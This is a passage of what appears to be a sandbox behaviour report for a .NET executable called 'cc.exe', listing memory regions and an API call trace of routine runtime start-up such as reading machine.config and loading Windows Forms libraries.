name = "private_0x0000000000370000" filename = "" Region: id = 407 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 408 start_va = 0x370000 end_va = 0x37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 409 start_va = 0x5e0000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 410 start_va = 0x5070000 end_va = 0x516ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005070000" filename = "" Region: id = 411 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 412 start_va = 0x380000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 413 start_va = 0x5a0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 414 start_va = 0x4e60000 end_va = 0x4f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004e60000" filename = "" Region: id = 415 start_va = 0x4f80000 end_va = 0x4fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 416 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 417 start_va = 0x6ed90000 end_va = 0x6f333fff monitored = 1 entry_point = 0x6f31b692 region_type = mapped_file name = "system.windows.forms.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.windows.forms\\v4.0_4.0.0.0__b77a5c561934e089\\system.windows.forms.dll") Region: id = 418 start_va = 0x380000 end_va = 0x381fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 419 start_va = 0x6eb20000 end_va = 0x6f337fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 420 start_va = 0x6ea10000 end_va = 0x6eb14fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 421 start_va = 0x6e290000 end_va = 0x6ea03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 422 start_va = 0x755b0000 end_va = 0x761f9fff monitored = 0 entry_point = 0x75631601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 423 start_va = 0x390000 end_va = 0x390fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 424 start_va = 0x744c0000 end_va = 0x744cafff monitored = 0 entry_point = 0x744c1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 425 start_va = 0x75230000 end_va = 0x75246fff monitored = 0 entry_point = 0x752335fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 426 start_va = 0x74180000 end_va = 0x74196fff monitored = 0 entry_point = 0x74183573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 427 start_va = 0x9b0000 end_va = 0x9ebfff monitored = 0 entry_point = 0x9b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 428 start_va = 0x9b0000 end_va = 0x9ebfff monitored = 0 entry_point = 0x9b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 429 start_va = 0x9b0000 end_va = 0x9ebfff monitored = 0 entry_point = 0x9b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 430 start_va = 0x9b0000 end_va = 0x9ebfff monitored = 0 entry_point = 0x9b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 431 start_va = 0x9b0000 end_va = 0x9ebfff monitored = 0 entry_point = 0x9b128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 432 start_va = 0x74140000 end_va = 0x7417afff monitored = 0 entry_point = 0x7414128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 433 start_va = 0xd80000 end_va = 0xe01fff monitored = 0 entry_point = 0xd819a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 434 start_va = 0xd80000 end_va = 0xe01fff monitored = 0 entry_point = 0xd819a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 435 start_va = 0x6e200000 end_va = 0x6e283fff monitored = 0 entry_point = 0x6e2019a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 436 start_va = 0x12c0000 end_va = 0x13cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 437 start_va = 0xd80000 end_va = 0xde1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 438 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 439 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 440 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 441 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 442 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 443 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 444 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 445 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 446 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 447 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 448 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 449 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 450 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 451 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 452 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 453 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 454 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 455 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 456 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 457 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 458 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 459 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 460 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 461 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 462 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 463 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 464 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 465 start_va = 0x540000 end_va = 0x54ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 466 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 503 start_va = 0x742a0000 end_va = 0x742b2fff monitored = 0 entry_point = 0x742a1d3f region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1122 start_va = 0xa60000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 1123 start_va = 0x12c0000 end_va = 0x13bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1124 start_va = 0x13c0000 end_va = 0x13cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 1125 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1662 start_va = 0xe00000 end_va = 0xe3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1663 start_va = 0x5350000 end_va = 0x544ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005350000" filename = "" Region: id = 1664 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 9617 start_va = 0x10e0000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Thread: id = 1 os_tid = 0xf68 [0056.012] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0062.022] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x36e0ec, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.030] GetEnvironmentVariableW (in: lpName="COR_PROFILER", lpBuffer=0x36e510, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.030] GetEnvironmentVariableW (in: lpName="COR_ENABLE_PROFILING", lpBuffer=0x36e510, nSize=0x80 | out: lpBuffer="") returned 0x0 [0062.118] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x36e950 | out: phkResult=0x36e950*=0x0) returned 0x2 [0062.118] RegCloseKey (hKey=0x80000002) returned 0x0 [0062.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x36ebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0062.144] IsAppThemed () returned 0x1 [0062.152] CoTaskMemAlloc (cb=0xf0) returned 0x437860 [0062.152] CreateActCtxA (pActCtx=0x36f0f8) returned 0x437a54 [0062.289] CoTaskMemFree (pv=0x437860) [0062.301] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc1bc [0062.301] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc190 [0062.373] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", nBufferLength=0x105, lpBuffer=0x36ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe", lpFilePart=0x0) returned 0x21 [0062.937] GetCurrentProcess () returned 0xffffffff [0062.938] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ed98 | out: TokenHandle=0x36ed98*=0x228) returned 1 [0062.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x36e850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0062.943] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x36ed90 | out: lpFileInformation=0x36ed90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0062.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x36e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0062.944] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x36ed98 | out: lpFileInformation=0x36ed98*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0062.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x36e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0062.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36ecd0) returned 1 [0062.958] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x22c [0062.958] GetFileType (hFile=0x22c) returned 0x1 [0062.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36eccc) returned 1 [0062.958] GetFileType (hFile=0x22c) returned 0x1 [0066.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x36e008, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0066.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x36e06c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0066.579] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36e2ac) returned 1 [0066.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x36e570 | out: lpFileInformation=0x36e570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc63fb400, ftCreationTime.dwHighDateTime=0x1d4e4ee, ftLastAccessTime.dwLowDateTime=0xb9f350b0, ftLastAccessTime.dwHighDateTime=0x1d706ae, ftLastWriteTime.dwLowDateTime=0xc63fb400, ftLastWriteTime.dwHighDateTime=0x1d4e4ee, nFileSizeHigh=0x0, nFileSizeLow=0x8c8e)) returned 1 [0066.579] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36e2a8) returned 1 [0067.139] BCryptGetFipsAlgorithmMode (in: pfEnabled=0x36e43c | out: pfEnabled=0x36e43c) returned 0x0 [0068.296] GetFileSize (in: hFile=0x22c, lpFileSizeHigh=0x36ed8c | out: lpFileSizeHigh=0x36ed8c*=0x0) returned 0x8c8e [0068.297] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36ed48, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36ed48*=0x1000, lpOverlapped=0x0) returned 1 [0068.342] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36ebf8, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36ebf8*=0x1000, lpOverlapped=0x0) returned 1 [0068.343] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36eaac, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36eaac*=0x1000, lpOverlapped=0x0) returned 1 [0068.343] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36eaac, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36eaac*=0x1000, lpOverlapped=0x0) returned 1 [0068.378] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36eaac, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36eaac*=0x1000, lpOverlapped=0x0) returned 1 [0068.379] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36e9e4, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36e9e4*=0x1000, lpOverlapped=0x0) returned 1 [0068.384] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36eb50, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36eb50*=0x1000, lpOverlapped=0x0) returned 1 [0068.386] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36ea44, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36ea44*=0x1000, lpOverlapped=0x0) returned 1 [0068.386] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36ea44, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36ea44*=0xc8e, lpOverlapped=0x0) returned 1 [0068.386] ReadFile (in: hFile=0x22c, lpBuffer=0x28c0414, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x36eb08, lpOverlapped=0x0 | out: lpBuffer=0x28c0414*, lpNumberOfBytesRead=0x36eb08*=0x0, lpOverlapped=0x0) returned 1 [0068.386] CloseHandle (hObject=0x22c) returned 1 [0068.387] CloseHandle (hObject=0x228) returned 1 [0068.388] GetCurrentProcess () returned 0xffffffff [0068.388] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36eee4 | out: TokenHandle=0x36eee4*=0x228) returned 1 [0068.389] CloseHandle (hObject=0x228) returned 1 [0068.389] GetCurrentProcess () returned 0xffffffff [0068.389] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36eee4 | out: TokenHandle=0x36eee4*=0x228) returned 1 [0068.390] CloseHandle (hObject=0x228) returned 1 [0068.399] GetCurrentProcess () returned 0xffffffff [0068.399] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ed98 | out: TokenHandle=0x36ed98*=0x228) returned 1 [0068.400] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x36ed90 | out: lpFileInformation=0x36ed90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0068.400] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe.config", nBufferLength=0x105, lpBuffer=0x36e81c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe.config", lpFilePart=0x0) returned 0x28 [0068.401] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\cc.exe.config" (normalized: "c:\\users\\keecfmwgj\\desktop\\cc.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x36ed98 | out: lpFileInformation=0x36ed98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0068.401] CloseHandle (hObject=0x228) returned 1 [0068.401] GetCurrentProcess () returned 0xffffffff [0068.402] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36eee4 | out: TokenHandle=0x36eee4*=0x228) returned 1 [0068.402] CloseHandle (hObject=0x228) returned 1 [0068.403] GetCurrentProcess () returned 0xffffffff [0068.403] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36eee4 | out: TokenHandle=0x36eee4*=0x228) returned 1 [0068.404] CloseHandle (hObject=0x228) returned 1 [0068.415] GetCurrentProcess () returned 0xffffffff [0068.415] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ecfc | out: TokenHandle=0x36ecfc*=0x228) returned 1 [0068.423] CloseHandle (hObject=0x228) returned 1 [0068.423] GetCurrentProcess () returned 0xffffffff [0068.423] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x36ed14 | out: TokenHandle=0x36ed14*=0x228) returned 1 [0068.437] CloseHandle (hObject=0x228) returned 1 [0068.455] GetSystemMetrics (nIndex=75) returned 1 [0068.488] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0069.507] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772b0000 [0069.512] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AddDllDirectory", cchWideChar=15, lpMultiByteStr=0x36efe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AddDllDirectory", lpUsedDefaultChar=0x0) returned 15 [0069.512] GetProcAddress (hModule=0x772b0000, lpProcName="AddDllDirectory") returned 0x773f1e91 [0069.512] LoadLibraryExW (lpLibFileName="comctl32.dll", hFile=0x0, dwFlags=0x800) returned 0x6e200000 [0069.659] AdjustWindowRectEx (in: lpRect=0x36f148, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50001 | out: lpRect=0x36f148) returned 1 [0069.743] GetCurrentProcess () returned 0xffffffff [0069.743] GetCurrentThread () returned 0xfffffffe [0069.743] GetCurrentProcess () returned 0xffffffff [0069.743] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x36f060, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x36f060*=0x22c) returned 1 [0069.747] GetCurrentThreadId () returned 0xf68 [0069.838] GetCurrentActCtx (in: lphActCtx=0x36efc0 | out: lphActCtx=0x36efc0*=0x0) returned 1 [0069.839] ActivateActCtx (in: hActCtx=0x437a54, lpCookie=0x36efd0 | out: hActCtx=0x437a54, lpCookie=0x36efd0) returned 1 [0069.841] GetModuleHandleW (lpModuleName="user32.dll") returned 0x766d0000 [0069.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x36ee78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcWVo3\x19ã¿Dþ3rDó6", lpUsedDefaultChar=0x0) returned 14 [0069.841] GetProcAddress (hModule=0x766d0000, lpProcName="DefWindowProcW") returned 0x778f25dd [0069.842] GetStockObject (i=5) returned 0x1900015 [0069.846] GetModuleHandleW (lpModuleName=0x0) returned 0x13d0000 [0069.848] CoTaskMemAlloc (cb=0x5c) returned 0x43c7d0 [0069.848] RegisterClassW (lpWndClass=0x36ee68) returned 